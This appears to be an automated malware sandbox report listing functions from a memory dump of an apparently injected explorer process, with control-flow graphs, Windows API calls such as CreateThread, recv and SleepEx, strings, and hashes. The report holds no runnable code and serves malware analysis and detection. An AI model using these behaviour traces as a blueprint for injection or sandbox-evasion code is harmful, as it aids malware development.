                                                          • Opcode ID: afdd9dc60bc69bf642595aad3bc3540aa9e70c86e3e19e65b1a924baeb6dc4f8
                                                          • Instruction ID: ca846759233ecf8382ae69a5ce4e9c4dd1a685860be17892e57ca66780c42999
                                                          • Opcode Fuzzy Hash: afdd9dc60bc69bf642595aad3bc3540aa9e70c86e3e19e65b1a924baeb6dc4f8
                                                          • Instruction Fuzzy Hash: 59D1D636608B85C6E764DB25F89876AB3B1F7C4794F104625DB9E43BA8CF78C485CB40
                                                          Function 02F5CB30 Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 77memoryfilesynchronizationCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 227 2f5cb30-2f5cb35 228 2f5cb39-2f5cb50 WaitForSingleObject 227->228 229 2f5cb56-2f5cb6f SHGetKnownFolderPath 228->229 230 2f5ccb2-2f5ccb8 228->230 231 2f5cb75-2f5cb90 LocalAlloc 229->231 232 2f5ccad 229->232 233 2f5cb96-2f5cc03 call 2f79e0c CreateFileW 231->233 234 2f5cca2-2f5cca7 CoTaskMemFree 231->234 232->228 237 2f5cc05-2f5cc0c 233->237 238 2f5cc84-2f5cc8a 233->238 234->232 241 2f5cc21-2f5cc6a CloseHandle LocalFree CoTaskMemFree OpenEventW 237->241 242 2f5cc0e-2f5cc15 237->242 239 2f5cc97-2f5cc9c LocalFree 238->239 240 2f5cc8c-2f5cc91 CloseHandle 238->240 239->234 240->239 243 2f5cc82 241->243 244 2f5cc6c-2f5cc7c SetEvent CloseHandle 241->244 242->238 245 2f5cc17 call 2f65700 242->245 243->230 244->243 247 2f5cc1c-2f5cc1f 245->247 247->238 247->241
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Free$CloseHandleLocal$EventTask$AllocCreateFileFolderKnownObjectOpenPathSingleWait
                                                          • String ID: %s\%s${2AE0253D-6774-42FC-9DD3-51772C8257F6}
                                                          • API String ID: 2734627627-315705121
                                                          • Opcode ID: 7b20291c261bb62bccf5721a0e13eb23e0080e9feab91e27596d1b943d789799
                                                          • Instruction ID: 916876ca93ebc8d988506a2c1df674021c50fb92d3b1565d43443b60deb3c1c3
                                                          • Opcode Fuzzy Hash: 7b20291c261bb62bccf5721a0e13eb23e0080e9feab91e27596d1b943d789799
                                                          • Instruction Fuzzy Hash: 3941B731504A9682E7209B64E95C36AA771F7C57F5F600336EBAA42AF4CF7DC496CB00
                                                          Function 032AC6DA Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 282threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 248 32ac6da-32ac6f5 250 32ac6fb-32ac704 248->250 251 32ac710-32ad1c1 CreateThread 248->251 250->251 252 32ac70a 250->252 256 32ad1cd-32ad1d4 251->256 257 32ad1c7 251->257 252->251 258 32ad1da-32ad1e7 256->258 259 32ad1f3 256->259 257->256 258->259 260 32ad1ed 258->260 261 32adb01-32adb10 call 32adb1b 259->261 260->259 264 32ada9f-32adac1 CloseHandle 261->264 265 32adb12-32adbbf call 32adba0 261->265 267 32adadc-32adaf4 264->267 268 32adac7-32adad0 264->268 274 32adbca-32adbe8 CreateThread 265->274 275 32adbc5 265->275 267->261 269 32adad6 268->269 270 32adad7-32adada 268->270 269->270 270->267 276 32adbee 274->276 277 32adbf4-32adc2d 274->277 275->274 276->277 280 32adc48-32ae64e 277->280 281 32adc33-32adc3c 277->281 287 32ae654 280->287 288 32ae655-32ae6b1 CreateThread 280->288 281->280 282 32adc42 281->282 282->280 287->288 291 32ae6c4-32ae6d3 288->291 293 32ae6d9-32ae6e7 291->293 294 32ae6ed-32af2af 291->294 293->294 308 32af2b2 294->308 308->308
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID: 'BuZ$*d97$$C$h$
                                                          • API String ID: 2422867632-944887820
                                                          • Opcode ID: 702d68333b9287a608375439d86c4f87446aa47d384a90a1799ae4871720305a
                                                          • Instruction ID: 429bd1679f86dbad1ab3a582d2582c70f198ef3cdc99ca5c4313130d3d71be5e
                                                          • Opcode Fuzzy Hash: 702d68333b9287a608375439d86c4f87446aa47d384a90a1799ae4871720305a
                                                          • Instruction Fuzzy Hash: D5A12477A39B41DFD311CFB8E8917AD77A2E318B58F084922DB9547F49DA7881E18B00
                                                          Function 02F760D0 Relevance: 16.7, APIs: 11, Instructions: 234timeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 309 2f760d0-2f760f2 310 2f760f4-2f76114 call 2f74d00 309->310 311 2f76119-2f76121 309->311 316 2f76607-2f7660e 310->316 313 2f76123-2f76125 311->313 314 2f7612a-2f7617a call 2f738f0 WSACreateEvent 311->314 313->316 319 2f76186-2f761b7 call 2f738f0 314->319 320 2f7617c 314->320 326 2f761c9-2f761d7 319->326 321 2f765ec-2f765fa 320->321 324 2f76605 321->324 325 2f765fc-2f76603 321->325 324->316 325->316 327 2f76200-2f76208 326->327 328 2f761d9-2f761fe 326->328 330 2f7620e-2f76224 327->330 331 2f765d9-2f765df 327->331 328->326 332 2f76236-2f76244 330->332 331->321 333 2f765e1-2f765e6 CloseHandle 331->333 334 2f76246-2f76267 WaitForSingleObject 332->334 335 2f7629d-2f762a5 332->335 333->321 336 2f7629b 334->336 337 2f76269-2f76294 334->337 338 2f762a7 335->338 339 2f762b1-2f762e3 call 2f74d00 335->339 336->332 337->336 338->331 343 2f762f5-2f76303 339->343 344 2f76305-2f76326 WaitForSingleObject 343->344 345 2f7635c-2f76364 343->345 346 2f7635a 344->346 347 2f76328-2f76353 344->347 348 2f76366 345->348 349 2f76370-2f76378 345->349 346->343 347->346 348->331 351 2f76384-2f7638c 349->351 352 2f7637a 349->352 353 2f763fe-2f76406 351->353 354 2f7638e-2f763f9 351->354 352->331 355 2f765d2 353->355 356 2f7640c-2f76417 WSAGetLastError 353->356 354->327 355->331 356->355 357 2f7641d-2f76438 WSAEventSelect 356->357 358 2f76453-2f76487 WSAWaitForMultipleEvents 357->358 359 2f7643a-2f76449 357->359 360 2f764a2-2f764aa 358->360 361 2f76489-2f76498 358->361 359->331 362 2f764c5-2f764cd 360->362 363 2f764ac-2f764bb 360->363 361->331 364 2f76556-2f76573 WSAEnumNetworkEvents 362->364 365 2f764d3-2f764de 362->365 363->331 367 2f76575-2f76584 364->367 368 2f76588-2f76590 364->368 366 2f764f0-2f764fe 365->366 369 2f76500-2f76521 WaitForSingleObject 366->369 370 2f7654c 366->370 367->331 371 2f76592-2f7659e 368->371 372 2f765a0-2f765a8 368->372 375 2f76523-2f76543 369->375 376 2f7654a 369->376 370->331 371->372 373 2f765af-2f765bb 371->373 372->373 374 2f765aa 372->374 377 2f765d0-2f765d4 373->377 378 2f765bd-2f765cc 373->378 374->327 375->376 376->366 377->327 378->331
                                                          APIs
                                                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 02F7610F
                                                            • Part of subcall function 02F74D00: recv.WS2_32 ref: 02F74D2C
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Timer$ChangeConcurrency::details::platform::__Queuerecv
                                                          • String ID:
                                                          • API String ID: 2709879575-0
                                                          • Opcode ID: 9932c48d30a493af779b53788e8de090b8f3c95410308306be4635da276b65b1
                                                          • Instruction ID: 5102b24d280f8550e642709e5483d503767cc703789fd3aa538ec368ea20d8fb
                                                          • Opcode Fuzzy Hash: 9932c48d30a493af779b53788e8de090b8f3c95410308306be4635da276b65b1
                                                          • Instruction Fuzzy Hash: 50C1B672608BC4CADB70CF15E5947AAB7A5F7C8785F00412ADB9A87B58DB79C484CF01
                                                          Function 02F62830 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • SHGetKnownFolderPath.SHELL32 ref: 02F628A7
                                                          • LocalAlloc.KERNEL32 ref: 02F628FC
                                                          • CoTaskMemFree.COMBASE ref: 02F62967
                                                            • Part of subcall function 02F79E0C: _errno.LIBCMT ref: 02F79E43
                                                            • Part of subcall function 02F79E0C: _invalid_parameter_noinfo.LIBCMT ref: 02F79E4E
                                                          • CoTaskMemFree.COMBASE ref: 02F62955
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeTask$AllocFolderKnownLocalPath_errno_invalid_parameter_noinfo
                                                          • String ID: %s\%s\
                                                          • API String ID: 1287779424-2168696002
                                                          • Opcode ID: de1b1bcc6ede1dcf2e8e23314864cd4595dacdf089400319bb9193ecef9eea6c
                                                          • Instruction ID: 9baa97652c1a0e32a2bfb5cf176e41236ab481b71bdfbe89cfcc4c4011806213
                                                          • Opcode Fuzzy Hash: de1b1bcc6ede1dcf2e8e23314864cd4595dacdf089400319bb9193ecef9eea6c
                                                          • Instruction Fuzzy Hash: 40310B32608A8886DB50DB65E85436AB7B1F7C9BD0F504035EB8E83B68DF7DC945CB00
                                                          Function 032ADB1B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 397 32adb1b-32adbbf call 32adba0 402 32adbca-32adbe8 CreateThread 397->402 403 32adbc5 397->403 404 32adbee 402->404 405 32adbf4-32adc2d 402->405 403->402 404->405 408 32adc48-32ae64e 405->408 409 32adc33-32adc3c 405->409 415 32ae654 408->415 416 32ae655-32ae6b1 CreateThread 408->416 409->408 410 32adc42 409->410 410->408 415->416 419 32ae6c4-32ae6d3 416->419 421 32ae6d9-32ae6e7 419->421 422 32ae6ed-32af2af 419->422 421->422 436 32af2b2 422->436 436->436
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID: C$h
                                                          • API String ID: 2422867632-1881732633
                                                          • Opcode ID: dbfc3ccb343486b2ac083c1d57912f7e2fd0518c024c77fc865f148d8b6c11bd
                                                          • Instruction ID: 48dd813bb913875c27078d6051d7fc0c469ab8644a91a471b1488eb444eb670a
                                                          • Opcode Fuzzy Hash: dbfc3ccb343486b2ac083c1d57912f7e2fd0518c024c77fc865f148d8b6c11bd
                                                          • Instruction Fuzzy Hash: C5613677B39B40DBD311CF78E9907ACB6A3E318B58F054522DB9557F49EA7881D28B00
                                                          Function 032ADBA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 159threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 437 32adba0-32adbbf 438 32adbca-32adbe8 CreateThread 437->438 439 32adbc5 437->439 440 32adbee 438->440 441 32adbf4-32adc2d 438->441 439->438 440->441 444 32adc48-32ae64e 441->444 445 32adc33-32adc3c 441->445 451 32ae654 444->451 452 32ae655-32ae6b1 CreateThread 444->452 445->444 446 32adc42 445->446 446->444 451->452 455 32ae6c4-32ae6d3 452->455 457 32ae6d9-32ae6e7 455->457 458 32ae6ed-32af2af 455->458 457->458 472 32af2b2 458->472 472->472
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID: C$h
                                                          • API String ID: 2422867632-1881732633
                                                          • Opcode ID: ec1555d10d0f98300d53965cd10fda7cb85d233db3bec03abc006ddf52871c4d
                                                          • Instruction ID: f587d85e51d4a2e93a45876ec4be0d1c7b7618364b48a829192d236c3608b506
                                                          • Opcode Fuzzy Hash: ec1555d10d0f98300d53965cd10fda7cb85d233db3bec03abc006ddf52871c4d
                                                          • Instruction Fuzzy Hash: 9B510873A39B00DBD311CF78E9847ACB6A2F318B58F054422DB9557F18EA7881D58B00
                                                          Function 0329E328 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111timeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 473 329e328-329e357 475 329e35d 473->475 476 329e363-329e66f timeGetTime SleepEx 473->476 475->476 481 329e682-329e793 476->481
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SleepTimetime
                                                          • String ID: zl+s
                                                          • API String ID: 346578373-3682037839
                                                          • Opcode ID: 7a1bc4b6aa0322d314df026a60a62e37847645f6ba1a0e3e56957667ede5a820
                                                          • Instruction ID: af8474c0893dd963c53c7961457a093b8c98d019545eb0909300e58da46004a0
                                                          • Opcode Fuzzy Hash: 7a1bc4b6aa0322d314df026a60a62e37847645f6ba1a0e3e56957667ede5a820
                                                          • Instruction Fuzzy Hash: 2C41F27787A650CFAB10CEB988440ED33F2E348BA872B4867DA1567B58D6745CD28B80
                                                          Function 0329EFD1 Relevance: 3.1, APIs: 2, Instructions: 105timeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 486 329efd1-329f2a4 timeGetTime 489 329f2ba-329f2e5 486->489 490 329f2aa-329f2b6 486->490 492 329f2eb 489->492 493 329f2f1-329f31c SleepEx 489->493 490->489 492->493 495 329f335-329f351 493->495 496 329f36b 495->496 497 329f357-329f374 call 329f365 495->497 499 329f375-329f37d 496->499 497->499 501 329f3a1-329f436 499->501 502 329f383-329f39b 499->502 509 329f44a 501->509 502->501 509->509
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SleepTimetime
                                                          • String ID:
                                                          • API String ID: 346578373-0
                                                          • Opcode ID: 0588bb7d5e06624d053139eab1c92b94c2584bf248cb8d7d624155c32efe7439
                                                          • Instruction ID: 6acc28555ddd34bc139ac013f22a5f4cedab4015051cf04560dc23cbd367f079
                                                          • Opcode Fuzzy Hash: 0588bb7d5e06624d053139eab1c92b94c2584bf248cb8d7d624155c32efe7439
                                                          • Instruction Fuzzy Hash: F841017B83A650DFEB41CFB585001EC33F3E748729B2A4817CB54A7B48E27458E68B84
                                                          Function 0329DBB1 Relevance: 3.1, APIs: 2, Instructions: 97timeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 510 329dbb1-329de99 timeGetTime 514 329de9f 510->514 515 329dea5-329decc 510->515 514->515 517 329ded8-329dee2 515->517 518 329ded2 515->518 519 329df08-329df5c SleepEx 517->519 520 329dee8-329def1 517->520 518->517 522 329df67-329df68 519->522 520->519 521 329def7 520->521 521->519 523 329df6e 522->523 524 329df74-329df80 522->524 523->524 525 329df94-329df9a 524->525 526 329df86 524->526 527 329dfa0 525->527 528 329dfa5-329dfbf 525->528 526->525 527->528 530 329dfc8-329e011 528->530 531 329dfc5 528->531 533 329e01d-329e04b 530->533 534 329e017 530->534 531->530 535 329e06d-329e072 533->535 536 329e051-329e069 533->536 534->533 538 329e082 535->538 536->535 538->538
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SleepTimetime
                                                          • String ID:
                                                          • API String ID: 346578373-0
                                                          • Opcode ID: c5e148b59586c6d73523217e6074b0b34bc6d7151107465fa25a940704e5eafd
                                                          • Instruction ID: 2ab241536360a4b4e463d6c908711c15839ff0eac5e31137d25a9e235eb35173
                                                          • Opcode Fuzzy Hash: c5e148b59586c6d73523217e6074b0b34bc6d7151107465fa25a940704e5eafd
                                                          • Instruction Fuzzy Hash: 2E31C07B836200CFAB10CFB5C4521ED77F3E724B6871A092BDA256BF18D27118E59B80
                                                          Function 0329EEE0 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
